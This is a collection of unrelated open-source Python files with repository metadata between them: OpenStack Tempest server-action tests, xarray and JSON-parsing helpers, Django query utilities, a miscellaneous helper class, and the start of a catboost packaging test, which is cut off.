@decorators.attr(type='slow')
@decorators.idempotent_id('b68bd8d6-855d-4212-b59b-2e704044dace')
@utils.services('volume')
def test_rebuild_server_with_volume_attached(self):
"""Test rebuilding server with volume attached
The volume should be attached to the instance after rebuild.
"""
# create a new volume and attach it to the server
volume = self.create_volume()
server = self.client.show_server(self.server_id)['server']
self.attach_volume(server, volume)
# run general rebuild test
self._test_rebuild_server()
# make sure the volume is attached to the instance after rebuild
vol_after_rebuild = self.volumes_client.show_volume(volume['id'])
vol_after_rebuild = vol_after_rebuild['volume']
self.assertEqual('in-use', vol_after_rebuild['status'])
self.assertEqual(self.server_id,
vol_after_rebuild['attachments'][0]['server_id'])
if CONF.validation.run_validation:
validation_resources = self.get_class_validation_resources(
self.os_primary)
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_alt_user,
password=None,
pkey=validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
linux_client.validate_authentication()
def _test_resize_server_confirm(self, server_id, stop=False):
# The server's RAM and disk space should be modified to that of
# the provided flavor
if stop:
self.client.stop_server(server_id)
waiters.wait_for_server_status(self.client, server_id,
'SHUTOFF')
self.client.resize_server(server_id, self.flavor_ref_alt)
# NOTE(jlk): Explicitly delete the server to get a new one for later
# tests. Avoids resize down race issues.
self.addCleanup(self.delete_server, server_id)
waiters.wait_for_server_status(self.client, server_id,
'VERIFY_RESIZE')
self.client.confirm_resize_server(server_id)
expected_status = 'SHUTOFF' if stop else 'ACTIVE'
waiters.wait_for_server_status(self.client, server_id,
expected_status)
server = self.client.show_server(server_id)['server']
self.assert_flavor_equal(self.flavor_ref_alt, server['flavor'])
if stop:
# NOTE(mriedem): tearDown requires the server to be started.
self.client.start_server(server_id)
@decorators.idempotent_id('1499262a-9328-4eda-9068-db1ac57498d2')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
def test_resize_server_confirm(self):
"""Test resizing server and then confirming"""
self._test_resize_server_confirm(self.server_id, stop=False)
@decorators.idempotent_id('e6c28180-7454-4b59-b188-0257af08a63b')
@decorators.related_bug('1728603')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@utils.services('volume')
def test_resize_volume_backed_server_confirm(self):
"""Test resizing a volume backed server and then confirming"""
# We have to create a new server that is volume-backed since the one
# from setUp is not volume-backed.
kwargs = {'volume_backed': True,
'wait_until': 'ACTIVE'}
if CONF.validation.run_validation:
validation_resources = self.get_test_validation_resources(
self.os_primary)
kwargs.update({'validatable': True,
'validation_resources': validation_resources})
server = self.create_test_server(**kwargs)
# NOTE(mgoddard): Get detailed server to ensure addresses are present
# in fixed IP case.
server = self.servers_client.show_server(server['id'])['server']
self._test_resize_server_confirm(server['id'])
if CONF.compute_feature_enabled.console_output:
# Now do something interactive with the guest like get its console
# output; we don't actually care about the output,
# just that it doesn't raise an error.
self.client.get_console_output(server['id'])
if CONF.validation.run_validation:
linux_client = remote_client.RemoteClient(
self.get_server_ip(server, validation_resources),
self.ssh_user,
password=None,
pkey=validation_resources['keypair']['private_key'],
server=server,
servers_client=self.client)
linux_client.validate_authentication()
@decorators.idempotent_id('138b131d-66df-48c9-a171-64f45eb92962')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
def test_resize_server_confirm_from_stopped(self):
"""Test resizing a stopped server and then confirming"""
self._test_resize_server_confirm(self.server_id, stop=True)
@decorators.idempotent_id('c03aab19-adb1-44f5-917d-c419577e9e68')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
def test_resize_server_revert(self):
"""Test resizing server and then reverting
The server's RAM and disk space should return to its original
values after a resize is reverted.
"""
self.client.resize_server(self.server_id, self.flavor_ref_alt)
# NOTE(zhufl): Explicitly delete the server to get a new one for later
# tests. Avoids resize down race issues.
self.addCleanup(self.delete_server, self.server_id)
waiters.wait_for_server_status(self.client, self.server_id,
'VERIFY_RESIZE')
self.client.revert_resize_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
server = self.client.show_server(self.server_id)['server']
self.assert_flavor_equal(self.flavor_ref, server['flavor'])
@decorators.idempotent_id('fbbf075f-a812-4022-bc5c-ccb8047eef12')
@decorators.related_bug('1737599')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@utils.services('volume')
def test_resize_server_revert_with_volume_attached(self):
"""Test resizing a volume attached server and then reverting
Tests attaching a volume to a server instance and then resizing
the instance. Once the instance is resized, revert the resize which
should move the instance and volume attachment back to the original
compute host.
"""
# Create a blank volume and attach it to the server created in setUp.
volume = self.create_volume()
server = self.client.show_server(self.server_id)['server']
self.attach_volume(server, volume)
# Now resize the server with the blank volume attached.
self.client.resize_server(self.server_id, self.flavor_ref_alt)
# Explicitly delete the server to get a new one for later
# tests. Avoids resize down race issues.
self.addCleanup(self.delete_server, self.server_id)
waiters.wait_for_server_status(
self.client, self.server_id, 'VERIFY_RESIZE')
# Now revert the resize which should move the instance and it's volume
# attachment back to the original source compute host.
self.client.revert_resize_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
# Make sure everything still looks OK.
server = self.client.show_server(self.server_id)['server']
self.assert_flavor_equal(self.flavor_ref, server['flavor'])
attached_volumes = server['os-extended-volumes:volumes_attached']
self.assertEqual(1, len(attached_volumes))
self.assertEqual(volume['id'], attached_volumes[0]['id'])
@decorators.idempotent_id('b963d4f1-94b3-4c40-9e97-7b583f46e470')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting not available, backup not possible.')
@utils.services('image')
def test_create_backup(self):
"""Test creating server backup
1. create server backup1 with rotation=2, there are 1 backup.
2. create server backup2 with rotation=2, there are 2 backups.
3. create server backup3, due to the rotation is 2, the first one
(backup1) will be deleted, so now there are still 2 backups.
"""
# create the first and the second backup
# Check if glance v1 is available to determine which client to use. We
# prefer glance v1 for the compute API tests since the compute image
# API proxy was written for glance v1.
if CONF.image_feature_enabled.api_v1:
glance_client = self.os_primary.image_client
elif CONF.image_feature_enabled.api_v2:
glance_client = self.os_primary.image_client_v2
else:
raise lib_exc.InvalidConfiguration(
'Either api_v1 or api_v2 must be True in '
'[image-feature-enabled].')
backup1 = data_utils.rand_name('backup-1')
resp = self.client.create_backup(self.server_id,
backup_type='daily',
rotation=2,
name=backup1)
oldest_backup_exist = True
# the oldest one should be deleted automatically in this test
def _clean_oldest_backup(oldest_backup):
if oldest_backup_exist:
try:
glance_client.delete_image(oldest_backup)
except lib_exc.NotFound:
pass
else:
LOG.warning("Deletion of oldest backup %s should not have "
"been successful as it should have been "
"deleted during rotation.", oldest_backup)
if api_version_utils.compare_version_header_to_response(
"OpenStack-API-Version", "compute 2.45", resp.response, "lt"):
image1_id = resp['image_id']
else:
image1_id = data_utils.parse_image_id(resp.response['location'])
self.addCleanup(_clean_oldest_backup, image1_id)
waiters.wait_for_image_status(glance_client,
image1_id, 'active')
backup2 = data_utils.rand_name('backup-2')
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
resp = self.client.create_backup(self.server_id,
backup_type='daily',
rotation=2,
name=backup2)
if api_version_utils.compare_version_header_to_response(
"OpenStack-API-Version", "compute 2.45", resp.response, "lt"):
image2_id = resp['image_id']
else:
image2_id = data_utils.parse_image_id(resp.response['location'])
self.addCleanup(glance_client.delete_image, image2_id)
waiters.wait_for_image_status(glance_client,
image2_id, 'active')
# verify they have been created
properties = {
'image_type': 'backup',
'backup_type': "daily",
'instance_uuid': self.server_id,
}
params = {
'status': 'active',
'sort_key': 'created_at',
'sort_dir': 'asc'
}
if CONF.image_feature_enabled.api_v1:
for key, value in properties.items():
params['property-%s' % key] = value
image_list = glance_client.list_images(
detail=True,
**params)['images']
else:
# Additional properties are flattened in glance v2.
params.update(properties)
image_list = glance_client.list_images(params)['images']
self.assertEqual(2, len(image_list))
self.assertEqual((backup1, backup2),
(image_list[0]['name'], image_list[1]['name']))
# create the third one, due to the rotation is 2,
# the first one will be deleted
backup3 = data_utils.rand_name('backup-3')
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
resp = self.client.create_backup(self.server_id,
backup_type='daily',
rotation=2,
name=backup3)
if api_version_utils.compare_version_header_to_response(
"OpenStack-API-Version", "compute 2.45", resp.response, "lt"):
image3_id = resp['image_id']
else:
image3_id = data_utils.parse_image_id(resp.response['location'])
self.addCleanup(glance_client.delete_image, image3_id)
# the first back up should be deleted
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
glance_client.wait_for_resource_deletion(image1_id)
oldest_backup_exist = False
if CONF.image_feature_enabled.api_v1:
image_list = glance_client.list_images(
detail=True, **params)['images']
else:
image_list = glance_client.list_images(params)['images']
self.assertEqual(2, len(image_list),
'Unexpected number of images for '
'v2:test_create_backup; was the oldest backup not '
'yet deleted? Image list: %s' %
[image['name'] for image in image_list])
self.assertEqual((backup2, backup3),
(image_list[0]['name'], image_list[1]['name']))
def _get_output(self):
output = self.client.get_console_output(
self.server_id, length=3)['output']
self.assertTrue(output, "Console output was empty.")
lines = len(output.split('\n'))
self.assertEqual(lines, 3)
@decorators.idempotent_id('4b8867e6-fffa-4d54-b1d1-6fdda57be2f3')
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
def test_get_console_output(self):
"""Test getting console output for a server
Should be able to GET the console output for a given server_id and
number of lines.
"""
# This reboot is necessary for outputting some console log after
# creating an instance backup. If an instance backup, the console
# log file is truncated and we cannot get any console log through
# "console-log" API.
# The detail is https://bugs.launchpad.net/nova/+bug/1251920
self.client.reboot_server(self.server_id, type='HARD')
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
self.wait_for(self._get_output)
@decorators.idempotent_id('89104062-69d8-4b19-a71b-f47b7af093d7')
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
def test_get_console_output_with_unlimited_size(self):
"""Test getting server's console output with unlimited size
The console output lines length should be bigger than the one
of test_get_console_output.
"""
server = self.create_test_server(wait_until='ACTIVE')
def _check_full_length_console_log():
output = self.client.get_console_output(server['id'])['output']
self.assertTrue(output, "Console output was empty.")
lines = len(output.split('\n'))
# NOTE: This test tries to get full length console log, and the
# length should be bigger than the one of test_get_console_output.
self.assertGreater(lines, 3, "Cannot get enough console log "
"length. (lines: %s)" % lines)
self.wait_for(_check_full_length_console_log)
@decorators.idempotent_id('5b65d4e7-4ecd-437c-83c0-d6b79d927568')
@testtools.skipUnless(CONF.compute_feature_enabled.console_output,
'Console output not supported.')
def test_get_console_output_server_id_in_shutoff_status(self):
"""Test getting console output for a server in SHUTOFF status
Should be able to GET the console output for a given server_id
in SHUTOFF status.
"""
# NOTE: SHUTOFF is irregular status. To avoid test instability,
# one server is created only for this test without using
# the server that was created in setUpClass.
server = self.create_test_server(wait_until='ACTIVE')
temp_server_id = server['id']
self.client.stop_server(temp_server_id)
waiters.wait_for_server_status(self.client, temp_server_id, 'SHUTOFF')
self.wait_for(self._get_output)
@decorators.idempotent_id('bd61a9fd-062f-4670-972b-2d6c3e3b9e73')
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
def test_pause_unpause_server(self):
"""Test pausing and unpausing server"""
self.client.pause_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'PAUSED')
self.client.unpause_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
@decorators.idempotent_id('0d8ee21e-b749-462d-83da-b85b41c86c7f')
@testtools.skipUnless(CONF.compute_feature_enabled.suspend,
'Suspend is not available.')
def test_suspend_resume_server(self):
"""Test suspending and resuming server"""
self.client.suspend_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id,
'SUSPENDED')
self.client.resume_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
@decorators.idempotent_id('77eba8e0-036e-4635-944b-f7a8f3b78dc9')
@testtools.skipUnless(CONF.compute_feature_enabled.shelve,
'Shelve is not available.')
@utils.services('image')
def test_shelve_unshelve_server(self):
"""Test shelving and unshelving server"""
if CONF.image_feature_enabled.api_v2:
glance_client = self.os_primary.image_client_v2
elif CONF.image_feature_enabled.api_v1:
glance_client = self.os_primary.image_client
else:
raise lib_exc.InvalidConfiguration(
'Either api_v1 or api_v2 must be True in '
'[image-feature-enabled].')
compute.shelve_server(self.client, self.server_id,
force_shelve_offload=True)
def _unshelve_server():
server_info = self.client.show_server(self.server_id)['server']
if 'SHELVED' in server_info['status']:
self.client.unshelve_server(self.server_id)
self.addCleanup(_unshelve_server)
server = self.client.show_server(self.server_id)['server']
image_name = server['name'] + '-shelved'
params = {'name': image_name}
if CONF.image_feature_enabled.api_v2:
images = glance_client.list_images(params)['images']
elif CONF.image_feature_enabled.api_v1:
images = glance_client.list_images(
detail=True, **params)['images']
self.assertEqual(1, len(images))
self.assertEqual(image_name, images[0]['name'])
self.client.unshelve_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
glance_client.wait_for_resource_deletion(images[0]['id'])
@decorators.idempotent_id('8cf9f450-a871-42cf-9bef-77eba189c0b0')
@decorators.related_bug('1745529')
@testtools.skipUnless(CONF.compute_feature_enabled.shelve,
'Shelve is not available.')
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
def test_shelve_paused_server(self):
"""Test shelving a paused server"""
server = self.create_test_server(wait_until='ACTIVE')
self.client.pause_server(server['id'])
waiters.wait_for_server_status(self.client, server['id'], 'PAUSED')
# Check if Shelve operation is successful on paused server.
compute.shelve_server(self.client, server['id'],
force_shelve_offload=True)
@decorators.idempotent_id('af8eafd4-38a7-4a4b-bdbc-75145a580560')
def test_stop_start_server(self):
"""Test stopping and starting server"""
self.client.stop_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'SHUTOFF')
self.client.start_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
@decorators.idempotent_id('80a8094c-211e-440a-ab88-9e59d556c7ee')
def test_lock_unlock_server(self):
"""Test locking and unlocking server
Lock the server, and trying to stop it will fail because locked
server is not allowed to be stopped by non-admin user.
Then unlock the server, now the server can be stopped and started.
"""
# Lock the server,try server stop(exceptions throw),unlock it and retry
self.client.lock_server(self.server_id)
self.addCleanup(self.client.unlock_server, self.server_id)
server = self.client.show_server(self.server_id)['server']
self.assertEqual(server['status'], 'ACTIVE')
# Locked server is not allowed to be stopped by non-admin user
self.assertRaises(lib_exc.Conflict,
self.client.stop_server, self.server_id)
self.client.unlock_server(self.server_id)
self.client.stop_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'SHUTOFF')
self.client.start_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'ACTIVE')
def _validate_url(self, url):
valid_scheme = ['http', 'https']
parsed_url = urlparse.urlparse(url)
self.assertNotEqual('None', parsed_url.port)
self.assertNotEqual('None', parsed_url.hostname)
self.assertIn(parsed_url.scheme, valid_scheme)
@decorators.idempotent_id('c6bc11bf-592e-4015-9319-1c98dc64daf5')
@testtools.skipUnless(CONF.compute_feature_enabled.vnc_console,
'VNC Console feature is disabled.')
def test_get_vnc_console(self):
"""Test getting vnc console from a server
The returned vnc console url should be in valid format.
"""
if self.is_requested_microversion_compatible('2.5'):
body = self.client.get_vnc_console(
self.server_id, type='novnc')['console']
else:
body = self.client.get_remote_console(
self.server_id, console_type='novnc',
protocol='vnc')['remote_console']
self.assertEqual('novnc', body['type'])
self.assertNotEqual('', body['url'])
self._validate_url(body['url'])
| 46.55598 | 79 | 0.645096 |
e222133f97f82175476b81cea67a73fa5c226257 | 1,973 | py | Python | cf_xarray/utils.py | kmpaul/cf-xarray | 5133a4dada23b18221f2136e1f763cda8e65f249 | [
"Apache-2.0"
] | null | null | null | cf_xarray/utils.py | kmpaul/cf-xarray | 5133a4dada23b18221f2136e1f763cda8e65f249 | [
"Apache-2.0"
] | 5 | 2020-09-11T20:54:31.000Z | 2020-10-18T18:12:58.000Z | cf_xarray/utils.py | kmpaul/cf-xarray | 5133a4dada23b18221f2136e1f763cda8e65f249 | [
"Apache-2.0"
] | null | null | null | from typing import Any, Dict, Hashable, Mapping, Optional, TypeVar, cast
K = TypeVar("K")
V = TypeVar("V")
T = TypeVar("T")
def either_dict_or_kwargs(
pos_kwargs: Optional[Mapping[Hashable, T]],
kw_kwargs: Mapping[str, T],
func_name: str,
) -> Mapping[Hashable, T]:
if pos_kwargs is not None:
if not is_dict_like(pos_kwargs):
raise ValueError(
"the first argument to .%s must be a dictionary" % func_name
)
if kw_kwargs:
raise ValueError(
"cannot specify both keyword and positional "
"arguments to .%s" % func_name
)
return pos_kwargs
else:
# Need an explicit cast to appease mypy due to invariance; see
# https://github.com/python/mypy/issues/6228
return cast(Mapping[Hashable, T], kw_kwargs)
def is_dict_like(value: Any) -> bool:
return hasattr(value, "keys") and hasattr(value, "__getitem__")
# copied from xarray
class UncachedAccessor:
"""Acts like a property, but on both classes and class instances
This class is necessary because some tools (e.g. pydoc and sphinx)
inspect classes for which property returns itself and not the
accessor.
"""
def __init__(self, accessor):
self._accessor = accessor
def __get__(self, obj, cls):
if obj is None:
return self._accessor
return self._accessor(obj)
def parse_cell_methods_attr(attr: str) -> Dict[str, str]:
"""
Parse cell_methods attributes (format is 'measure: name').
Parameters
----------
attr: str
String to parse
Returns
-------
Dictionary mapping measure to name
"""
strings = [s for scolons in attr.split(":") for s in scolons.split()]
if len(strings) % 2 != 0:
raise ValueError(f"attrs['cell_measures'] = {attr!r} is malformed.")
return dict(zip(strings[slice(0, None, 2)], strings[slice(1, None, 2)]))
| 28.185714 | 76 | 0.621389 |
f655851d18c746da26ebbd0599f194d4730bdbaa | 2,915 | py | Python | rson/pyjson.py | tundish/rson | dd37de14c02c048720e3dd159464aa7b8c4709a6 | [
"MIT"
] | 1 | 2016-07-22T19:40:58.000Z | 2016-07-22T19:40:58.000Z | rson/pyjson.py | pombreda/rson | dd37de14c02c048720e3dd159464aa7b8c4709a6 | [
"MIT"
] | null | null | null | rson/pyjson.py | pombreda/rson | dd37de14c02c048720e3dd159464aa7b8c4709a6 | [
"MIT"
] | null | null | null | '''
This module provides enough compatibility with simplejson to run
the testsuite, if desired.
Copyright (c) 2010, Patrick Maupin. All rights reserved.
See http://code.google.com/p/rson/source/browse/trunk/license.txt
'''
import re
import rson
class PyJsonTokenizer(rson.base.Tokenizer):
''' Fudges location information to make it more like simplejson
'''
@staticmethod
def sourceloc(token, oldloc=rson.base.Tokenizer.sourceloc):
offset, lineno, colno = oldloc(token)
return offset-1, lineno, max(colno-1, 1)
class PyJsonSystem(rson.base.RsonSystem):
''' Compatible JSON-only token syntax, tries to work same as simplejson
'''
Tokenizer = PyJsonTokenizer
# These are simple things that simplejson does
cachestrings = True
parse_int = int
disallow_multiple_object_keys = True
# simplejson sets these, but doesn't test for them, and I
# haven't bothered to implement them, or even figure out what they do.
allowed_extra_attributes = set('encoding parse_constant cls'.split())
# simplejson requires an unquoted literal to be
# a number or one of the special values like true
# or false, so report an error instead of wrapping
# something not in those categories into a string.
@staticmethod
def parse_unquoted_str(token):
token[-1].error('Invalid literal', token)
# Follow the JSON syntax for unquoted literals,
# plus add the simplejson Infinity and NaN.
# (Stock RSON does not use Infinity or NaN, and
# allows relaxed numeric patterns, including:
# - extra leading zeros on numbers
# - Missing 0 in front decimal point for floats
# - hex, binary, octal ints
# - embedded underscores in ints.)
# These features do not work with simplejson.
unquoted_pattern = r'''
(?:
true | false | null | # Special JSON names
Infinity | NaN |
(?P<num>
-? # Optional minus sign
(?:0|[1-9]\d*) | # Zero or digits with non-zero lead
(?P<float>
-? # Optional minus sign
(?:0|[1-9]\d*)
(?:\.\d+)? # Optional frac part
(?:[eE][-+]?\d+)? # Optional exponent
)
)
) \Z # Match end of string
'''
# The special_strings dict has Infinity and Nan added to it.
special_strings = dict(true = True, false = False, null = None,
Infinity = float('inf'), NaN = float('NaN'))
# RSON does not care about weird control characters embedded in strings,
# but JSON does. To pass the simplejson test suite, make it care about these.
quoted_splitter = re.compile(r'(\\u[0-9a-fA-F]{4}|\\.|"|[\x00-\x1f])').split
loads = PyJsonSystem.dispatcher_factory()
| 33.895349 | 82 | 0.610635 |
c1a690a524e5f4492ef10dd5d8a2840fa2e0bc0a | 7,039 | py | Python | django/db/models/query_utils.py | kix/django | 5262a288df07daa050a0e17669c3f103f47a8640 | [
"BSD-3-Clause"
] | 790 | 2015-01-03T02:13:39.000Z | 2020-05-10T19:53:57.000Z | AppServer/lib/django-1.5/django/db/models/query_utils.py | nlake44/appscale | 6944af660ca4cb772c9b6c2332ab28e5ef4d849f | [
"Apache-2.0"
] | 1,361 | 2015-01-08T23:09:40.000Z | 2020-04-14T00:03:04.000Z | AppServer/lib/django-1.5/django/db/models/query_utils.py | nlake44/appscale | 6944af660ca4cb772c9b6c2332ab28e5ef4d849f | [
"Apache-2.0"
] | 155 | 2015-01-08T22:59:31.000Z | 2020-04-08T08:01:53.000Z | """
Various data structures used in query construction.
Factored out from django.db.models.query to avoid making the main module very
large and/or so that they can be used by other modules without getting into
circular import difficulties.
"""
from __future__ import unicode_literals
from django.db.backends import util
from django.utils import six
from django.utils import tree
class InvalidQuery(Exception):
"""
The query passed to raw isn't a safe query to use with raw.
"""
pass
class QueryWrapper(object):
"""
A type that indicates the contents are an SQL fragment and the associate
parameters. Can be used to pass opaque data to a where-clause, for example.
"""
def __init__(self, sql, params):
self.data = sql, params
def as_sql(self, qn=None, connection=None):
return self.data
class Q(tree.Node):
"""
Encapsulates filters as objects that can then be combined logically (using
& and |).
"""
# Connection types
AND = 'AND'
OR = 'OR'
default = AND
def __init__(self, *args, **kwargs):
super(Q, self).__init__(children=list(args) + list(six.iteritems(kwargs)))
def _combine(self, other, conn):
if not isinstance(other, Q):
raise TypeError(other)
obj = type(self)()
obj.add(self, conn)
obj.add(other, conn)
return obj
def __or__(self, other):
return self._combine(other, self.OR)
def __and__(self, other):
return self._combine(other, self.AND)
def __invert__(self):
obj = type(self)()
obj.add(self, self.AND)
obj.negate()
return obj
class DeferredAttribute(object):
"""
A wrapper for a deferred-loading field. When the value is read from this
object the first time, the query is executed.
"""
def __init__(self, field_name, model):
self.field_name = field_name
def __get__(self, instance, owner):
"""
Retrieves and caches the value from the datastore on the first lookup.
Returns the cached value.
"""
from django.db.models.fields import FieldDoesNotExist
non_deferred_model = instance._meta.proxy_for_model
opts = non_deferred_model._meta
assert instance is not None
data = instance.__dict__
if data.get(self.field_name, self) is self:
# self.field_name is the attname of the field, but only() takes the
# actual name, so we need to translate it here.
try:
f = opts.get_field_by_name(self.field_name)[0]
except FieldDoesNotExist:
f = [f for f in opts.fields
if f.attname == self.field_name][0]
name = f.name
# Lets see if the field is part of the parent chain. If so we
# might be able to reuse the already loaded value. Refs #18343.
val = self._check_parent_chain(instance, name)
if val is None:
# We use only() instead of values() here because we want the
# various data coersion methods (to_python(), etc.) to be
# called here.
val = getattr(
non_deferred_model._base_manager.only(name).using(
instance._state.db).get(pk=instance.pk),
self.field_name
)
data[self.field_name] = val
return data[self.field_name]
def __set__(self, instance, value):
"""
Deferred loading attributes can be set normally (which means there will
never be a database lookup involved.
"""
instance.__dict__[self.field_name] = value
def _check_parent_chain(self, instance, name):
"""
Check if the field value can be fetched from a parent field already
loaded in the instance. This can be done if the to-be fetched
field is a primary key field.
"""
opts = instance._meta
f = opts.get_field_by_name(name)[0]
link_field = opts.get_ancestor_link(f.model)
if f.primary_key and f != link_field:
return getattr(instance, link_field.attname)
return None
def select_related_descend(field, restricted, requested, load_fields, reverse=False):
"""
Returns True if this field should be used to descend deeper for
select_related() purposes. Used by both the query construction code
(sql.query.fill_related_selections()) and the model instance creation code
(query.get_klass_info()).
Arguments:
* field - the field to be checked
* restricted - a boolean field, indicating if the field list has been
manually restricted using a requested clause)
* requested - The select_related() dictionary.
* load_fields - the set of fields to be loaded on this model
* reverse - boolean, True if we are checking a reverse select related
"""
if not field.rel:
return False
if field.rel.parent_link and not reverse:
return False
if restricted:
if reverse and field.related_query_name() not in requested:
return False
if not reverse and field.name not in requested:
return False
if not restricted and field.null:
return False
if load_fields:
if field.name not in load_fields:
if restricted and field.name in requested:
raise InvalidQuery("Field %s.%s cannot be both deferred"
" and traversed using select_related"
" at the same time." %
(field.model._meta.object_name, field.name))
return False
return True
# This function is needed because data descriptors must be defined on a class
# object, not an instance, to have any effect.
def deferred_class_factory(model, attrs):
"""
Returns a class object that is a copy of "model" with the specified "attrs"
being replaced with DeferredAttribute objects. The "pk_value" ties the
deferred attributes to a particular instance of the model.
"""
class Meta:
proxy = True
app_label = model._meta.app_label
# The app_cache wants a unique name for each model, otherwise the new class
# won't be created (we get an old one back). Therefore, we generate the
# name using the passed in attrs. It's OK to reuse an existing class
# object if the attrs are identical.
name = "%s_Deferred_%s" % (model.__name__, '_'.join(sorted(list(attrs))))
name = util.truncate_name(name, 80, 32)
overrides = dict([(attr, DeferredAttribute(attr, model))
for attr in attrs])
overrides["Meta"] = Meta
overrides["__module__"] = model.__module__
overrides["_deferred"] = True
return type(str(name), (model,), overrides)
# The above function is also used to unpickle model instances with deferred
# fields.
deferred_class_factory.__safe_for_unpickling__ = True
| 35.913265 | 85 | 0.636312 |
aae5911023caf8c6853b337ffea6634855cbfb95 | 4,709 | py | Python | pbx_gs_python_utils/utils/Misc.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 3 | 2018-12-14T15:43:46.000Z | 2019-04-25T07:44:58.000Z | pbx_gs_python_utils/utils/Misc.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 1 | 2019-05-11T14:19:37.000Z | 2019-05-11T14:51:04.000Z | pbx_gs_python_utils/utils/Misc.py | owasp-sbot/pbx-gs-python-utils | f448aa36c4448fc04d30c3a5b25640ea4d44a267 | [
"Apache-2.0"
] | 4 | 2018-12-27T04:54:14.000Z | 2019-05-11T14:07:47.000Z | import hashlib
import json
import pprint
import random
import string
import textwrap
import re
from time import sleep
class Misc:
@staticmethod
def array_add(array, value):
array.append(value)
return value
@staticmethod
def array_find(array, item):
try:
return array.index(item)
except:
return None
@staticmethod
def array_get(array, position=None):
if array and len(array) > 0:
if (position is not None) and len(array) > position:
return array[position]
@staticmethod
def array_pop(array, position=None):
if array and len(array) >0:
if (position is not None) and len(array) > position:
return array.pop(position)
else:
return array.pop()
@staticmethod
def array_pop_and_trim(array, position=None):
value = Misc.array_pop(array,position)
return Misc.trim(value)
@staticmethod
def chunks(items, split):
for i in range(0, len(items), split):
yield items[i:i + split]
@staticmethod
def class_name(target):
if target:
return type(target).__name__
return None
@staticmethod
def get_value(target, key, default=None):
if target is not None:
try:
value = target.get(key)
if value is not None:
return value
except:
pass
return default
@staticmethod
def get_random_color(max=5):
if max > 5: max = 5 # add support for more than 5 colors
colors = ['skyblue', 'darkseagreen', 'palevioletred', 'coral', 'darkgray']
return colors[Misc.random_number(0, max-1)]
@staticmethod
def is_number(value):
try:
int(value)
return True
except:
pass
return False
@staticmethod
def json_dumps(target, message=None):
if target:
return json.dumps(target, indent=4)
return message
@staticmethod
def json_format(target, message=None):
if target:
return json.dumps(target, indent=4)
return message
@staticmethod
def json_load(target):
if target:
try:
return json.loads(target)
except:
pass
return None
@staticmethod
def none_or_empty(target,field):
if target:
value = target.get(field)
return (value is None) or value == ''
return True
@staticmethod
def object_data(target):
#fields = [field for field in dir(target) if not callable(getattr(target, field)) and not field.startswith("a__")]
return target.__dict__ # this one seems to do the trick (if not look at the code sample above)
@staticmethod
def random_filename(extension='.tmp', length=10):
if len(extension) > 0 and extension[0] != '.' : extension = '.' + extension
return '{0}{1}'.format(''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) , extension)
@staticmethod
def random_number(min=1,max=65000):
return random.randint(min, max)
@staticmethod
def random_string_and_numbers(length=6,prefix=''):
return prefix + ''.join(random.choices(string.ascii_uppercase + string.digits, k=length))
@staticmethod
def md5(target):
if target:
return hashlib.md5('{0}'.format(target).encode()).hexdigest()
return None
@staticmethod
def trim(target):
if target:
return target.strip()
return target
@staticmethod
def to_int(value):
try:
return int(value)
except:
return None
@staticmethod
def wait(seconds):
sleep(seconds)
@staticmethod
def word_wrap(text,length = 40):
return '\n'.join(textwrap.wrap(text, length))
@staticmethod
def word_wrap_escaped(text,length = 40):
if text:
return '\\n'.join(textwrap.wrap(text, length))
@staticmethod
def convert_to_number(value):
if value != '':
try:
if value[0] == '£':
return float(re.sub(r'[^\d.]', '', value))
else:
return float(value)
except:
return 0
else:
return 0
@staticmethod
def remove_html_tags(html):
if html:
TAG_RE = re.compile(r'<[^>]+>')
return TAG_RE.sub('', html).replace(' ', ' ')
| 26.60452 | 124 | 0.55808 |
e7f1431813e1c7008a5fce26daf88ca9458f8e11 | 1,109 | py | Python | catboost/python-package/ut/medium/test_whl.py | PallHaraldsson/catboost | f4b86aae0acb853f0216081518d490e52722ad88 | [
"Apache-2.0"
] | null | null | null | catboost/python-package/ut/medium/test_whl.py | PallHaraldsson/catboost | f4b86aae0acb853f0216081518d490e52722ad88 | [
"Apache-2.0"
] | null | null | null | catboost/python-package/ut/medium/test_whl.py | PallHaraldsson/catboost | f4b86aae0acb853f0216081518d490e52722ad88 | [
"Apache-2.0"
] | null | null | null | import yatest.common
import shutil
import os
import zipfile
PYTHON_PACKAGE_DIR = os.path.join("catboost", "python-package")
def test_wheel():
shutil.copy(yatest.common.source_path(os.path.join(PYTHON_PACKAGE_DIR, "mk_wheel.py")), 'mk_wheel.py')
from mk_wheel import PythonTrait, make_wheel
